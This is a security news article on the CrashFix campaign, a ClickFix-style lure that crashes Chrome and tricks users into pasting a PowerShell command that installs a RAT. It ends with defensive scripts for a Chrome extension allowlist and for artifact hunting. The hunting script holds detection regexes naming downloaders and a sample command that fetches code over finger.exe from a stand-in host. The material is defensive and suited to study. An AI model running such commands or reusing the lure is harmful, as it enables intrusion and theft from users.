PROBABLYPWNED
Malware · February 15, 2026 · 3 min read

CrashFix Malware Crashes Browsers to Trick Enterprise Users

Microsoft warns of ClickFix variant that deliberately crashes Chrome, then social-engineers victims into running PowerShell. Only domain-joined hosts targeted.

James Rivera

Microsoft's security team flagged a new ClickFix variant that deliberately crashes victims' browsers, then tricks them into executing malicious commands under the guise of a repair procedure. The campaign, dubbed CrashFix, specifically targets domain-joined corporate workstations—ignoring consumer systems entirely.

Microsoft's threat intelligence blog describes CrashFix as a "notable escalation in ClickFix tradecraft" that combines user disruption with social engineering to boost infection rates while avoiding traditional exploit techniques.

How CrashFix Works

The attack chain starts with a malicious Chrome extension called NexShield, which masquerades as the legitimate uBlock Origin Lite ad blocker. The extension has appeared on unofficial download sites and in phishing campaigns directing users to fake Chrome Web Store pages.

Once installed, NexShield deliberately destabilizes Chrome through excessive memory allocation and DOM manipulation until the browser crashes. When Chrome restarts, the extension displays a fake "critical error" popup claiming the browser detected stability issues and needs repair.

The "Fix Now" button doesn't run code itself. It instructs the user to open the Windows Run dialog (Win+R), paste, and press Enter. Before the popup is shown, NexShield has already copied the malicious PowerShell command to the clipboard, so whatever the user pastes is attacker-controlled. The text looks like a harmless repair step (something like sfc /repair chrome), but what actually runs downloads and executes a Python-based RAT called ModeloRAT.

No exploit and no vulnerability are involved; the user launches the command from a legitimate shell and does the attacker's work. That sidesteps exploit-focused protections, but not endpoint detection as a whole: the activity still surfaces as a user-driven process chain (explorer.exe launching powershell.exe from the Run dialog), which behavioral EDR rules can flag.

Enterprise Targeting

CrashFix only activates on domain-joined machines. The extension checks for Active Directory membership before triggering the crash sequence. Consumer PCs and standalone workstations are ignored.

This selective targeting makes sense financially. Corporate networks contain higher-value data, and a single compromised workstation provides lateral movement opportunities. The attackers behind CrashFix—tracked as KongTuke—have operated since at least 2025, consistently focusing on business environments.

ModeloRAT Capabilities

The final payload communicates with command-and-control servers through periodic beacon requests. Core capabilities include:

  • Screenshot capture
  • Keylogging
  • File exfiltration
  • Browser credential theft
  • Arbitrary command execution

ModeloRAT establishes persistence through a Run registry entry (an autostart value under the CurrentVersion\Run key), so it is relaunched at each logon. Python-based malware is generally easier to analyze and detect than compiled code, but the same property lets the operators modify it quickly between campaigns.

Living-Off-the-Land Abuse

One particularly clever element: the PowerShell command abuses finger.exe, a legitimate Windows utility that queries user information from remote systems over the Finger protocol (TCP port 79). Using it as the downloader sidesteps detection rules written for the more commonly abused LOLBins such as certutil and bitsadmin. finger.exe is a documented LOLBin, but few environments alert on it, and it has essentially no business use on a modern network, which makes blocking or alerting on outbound finger.exe connections a cheap control.

We've seen similar LOLBin abuse in other recent campaigns where attackers chain together legitimate Windows utilities to avoid triggering behavioral detections.

Detection and Defense

Organizations should:

  1. Block unauthorized Chrome extensions - Use the Chrome enterprise policies ExtensionInstallBlocklist and ExtensionInstallAllowlist so that only approved extension IDs can be installed
  2. Monitor for finger.exe network activity - In most environments this utility has no legitimate reason to make outbound connections, so any process-creation or network event for finger.exe is a high-signal alert
  3. Train users on clipboard attacks - CrashFix works only if the user pastes and executes a command they did not type; no legitimate repair procedure asks for that
  4. Alert on PowerShell execution from the Run dialog - Commands launched from Win+R run as children of explorer.exe, so powershell.exe (or cmd.exe, mshta.exe) with that parent and a pasted-looking command line warrants investigation; the Explorer RunMRU registry key also records what was typed
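An added example of the first item as a concrete configuration; this is not code from the article or from Microsoft. Chrome reads its enterprise policies from HKLM\SOFTWARE\Policies\Google\Chrome, and the ExtensionInstallBlocklist and ExtensionInstallAllowlist policies are lists of numbered string values under those names. The script writes a deny-all blocklist with an explicit allowlist and reads the result back. The extension ID passed at the bottom is a placeholder (an assumption), to be replaced with the IDs your organization approves; run it elevated.

```powershell
# Added example (not the article's or Microsoft's code): enforce a Chrome
# extension allowlist through the Chrome enterprise policy registry keys.
# Assumptions: run elevated on the target host; the ID passed at the bottom is
# a placeholder until you replace it with the extension IDs you approve.

$ChromePolicyRoot = 'HKLM:\SOFTWARE\Policies\Google\Chrome'

function Set-ChromeExtensionAllowlist {
    param([Parameter(Mandatory)] [string[]] $AllowedExtensionIds)

    # Chrome extension IDs are 32 characters from a-p. Reject anything else so a
    # typo cannot leave you with a deny-all policy and an empty allowlist.
    foreach ($id in $AllowedExtensionIds) {
        if ($id -notmatch '^[a-p]{32}$') { throw "Not a valid Chrome extension ID: $id" }
    }

    $blockKey = Join-Path $ChromePolicyRoot 'ExtensionInstallBlocklist'
    $allowKey = Join-Path $ChromePolicyRoot 'ExtensionInstallAllowlist'

    foreach ($key in $blockKey, $allowKey) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # Drop stale numbered entries so the policy is exactly what we set here.
        foreach ($name in (Get-Item $key).GetValueNames() | Where-Object { $_ -ne '' }) {
            Remove-ItemProperty -Path $key -Name $name
        }
    }

    # "*" in the blocklist blocks every extension that is not explicitly allowlisted.
    New-ItemProperty -Path $blockKey -Name '1' -Value '*' -PropertyType String -Force | Out-Null

    $index = 1
    foreach ($id in $AllowedExtensionIds) {
        New-ItemProperty -Path $allowKey -Name "$index" -Value $id -PropertyType String -Force | Out-Null
        $index++
    }
}

function Get-ChromeExtensionPolicy {
    # Read both lists back, in policy order, so the change can be verified here
    # or audited on other hosts.
    $policy = @{}
    foreach ($list in 'ExtensionInstallBlocklist', 'ExtensionInstallAllowlist') {
        $key = Join-Path $ChromePolicyRoot $list
        $policy[$list] = @()
        if (Test-Path $key) {
            $names = (Get-Item $key).GetValueNames() | Where-Object { $_ -match '^\d+$' } | Sort-Object { [int]$_ }
            $policy[$list] = @(foreach ($name in $names) { Get-ItemPropertyValue -Path $key -Name $name })
        }
    }
    return $policy
}

# Usage: the ID below is a placeholder (assumption), not a real extension.
Set-ChromeExtensionAllowlist -AllowedExtensionIds @('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
Get-ChromeExtensionPolicy
```

Chrome applies the HKLM policy at its next policy refresh (visible at chrome://policy), and an already-installed extension that the blocklist now covers is disabled rather than left running. If the domain already pushes these policies through Group Policy, make the change there instead: GPO will overwrite locally written values at the next refresh.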

The social engineering aspect is harder to defend against technically. Users who believe their browser is genuinely broken may follow "repair" instructions without suspicion. Security awareness training should specifically address scenarios where software prompts users to run commands—legitimate applications almost never require this.

For organizations that have seen CrashFix indicators, assume compromise and investigate affected workstations for ModeloRAT artifacts. The RAT's registry persistence and beacon traffic provide detection opportunities post-infection.
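An added triage script for the post-infection investigation described above and for the finger.exe abuse discussed under Living-Off-the-Land Abuse; it is not the article's or Microsoft's code. It reads two locations Windows itself maintains: the Explorer RunMRU key, which records what the current user typed into the Run dialog (the paste step of the lure), and the per-user and per-machine CurrentVersion\Run autostart keys (where a Run-entry persistence would appear), and flags entries that reference a shell, a downloader such as finger.exe, an obfuscation primitive, or a script interpreter in a user-writable path. The regular expressions are illustrative and deliberately broad, and the sample entries at the bottom are constructed, not real telemetry, so the matcher can be exercised offline before the live run.

```powershell
# Added example (not the article's or Microsoft's code): hunt a workstation for
# the artifacts a ClickFix-style infection tends to leave behind.
# Assumptions: standard Windows registry locations for the Run dialog history
# and the autostart keys; illustrative, deliberately broad regexes; the sample
# entries at the bottom are constructed, not real telemetry.

# What a user pasted into Win+R: shells, downloaders (finger.exe included),
# and common PowerShell obfuscation primitives.
$SuspiciousRunCommand = '(?i)\b(powershell|pwsh|mshta|finger|curl|certutil|bitsadmin)\b|\biex\b|invoke-expression|frombase64string|-e(nc|ncodedcommand)?\b'

# Autostart values pointing at a script interpreter or a user-writable path
# are unusual on a managed workstation.
$SuspiciousAutostart = '(?i)\b(python|pythonw|wscript|cscript)(\.exe)?\b|\\AppData\\|\\Temp\\|\\ProgramData\\'

function Get-RunMruEntries {
    # RunMRU holds what the current user typed into the Run dialog. Value names
    # are single letters, MRUList orders them (most recent first), and each
    # string carries a trailing "\1" that is not part of the command.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return }
    $props = Get-ItemProperty -Path $key
    $order = if ($props.MRUList) { $props.MRUList.ToCharArray() } else { @() }
    foreach ($slot in $order) {
        $raw = $props.PSObject.Properties[[string]$slot].Value
        if ($raw) {
            [pscustomobject]@{ Source = 'RunMRU'; Name = [string]$slot; Command = ($raw -replace '\\1$', '') }
        }
    }
}

function Get-AutostartEntries {
    # Per-user and per-machine Run keys: every value here launches at logon.
    $keys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($name in (Get-Item $key).GetValueNames() | Where-Object { $_ -ne '' }) {
            [pscustomobject]@{ Source = $key; Name = $name; Command = (Get-ItemPropertyValue -Path $key -Name $name) }
        }
    }
}

function Find-ClickFixArtifacts {
    # Takes entries shaped like the two collectors' output and returns the ones
    # that match, with the matched fragment as the reason.
    param([Parameter(Mandatory)] [AllowEmptyCollection()] [object[]] $Entries)
    foreach ($entry in $Entries) {
        $pattern = if ($entry.Source -eq 'RunMRU') { $SuspiciousRunCommand } else { $SuspiciousAutostart }
        $m = [regex]::Match($entry.Command, $pattern)
        if ($m.Success) {
            [pscustomobject]@{ Source = $entry.Source; Name = $entry.Name; Reason = $m.Value; Command = $entry.Command }
        }
    }
}

# Constructed sample (not real telemetry): a benign Run entry, a pasted
# command that reaches for finger.exe, and a Python autostart under AppData.
$Sample = @(
    [pscustomobject]@{ Source = 'RunMRU'; Name = 'a'; Command = 'notepad' },
    [pscustomobject]@{ Source = 'RunMRU'; Name = 'b'; Command = 'powershell -w hidden -c "finger update@203.0.113.10"' },
    [pscustomobject]@{ Source = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'; Name = 'Updater'
                       Command = 'C:\Users\jdoe\AppData\Roaming\upd\pythonw.exe agent.py' }
)
Find-ClickFixArtifacts -Entries $Sample | Format-Table -AutoSize   # flags 'b' and 'Updater', not 'a'

# Live run on this host:
Find-ClickFixArtifacts -Entries @(@(Get-RunMruEntries) + @(Get-AutostartEntries)) | Format-Table -AutoSize
```

Run it as the affected user for the RunMRU half (the key is per-user) and elevated for the HKLM Run key. A hit is a lead, not a verdict: pull the full command line, the file it points to, and the process and network telemetry around the same time, and treat any finger.exe invocation as the strongest signal in the set because nothing on a managed workstation should be using it.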
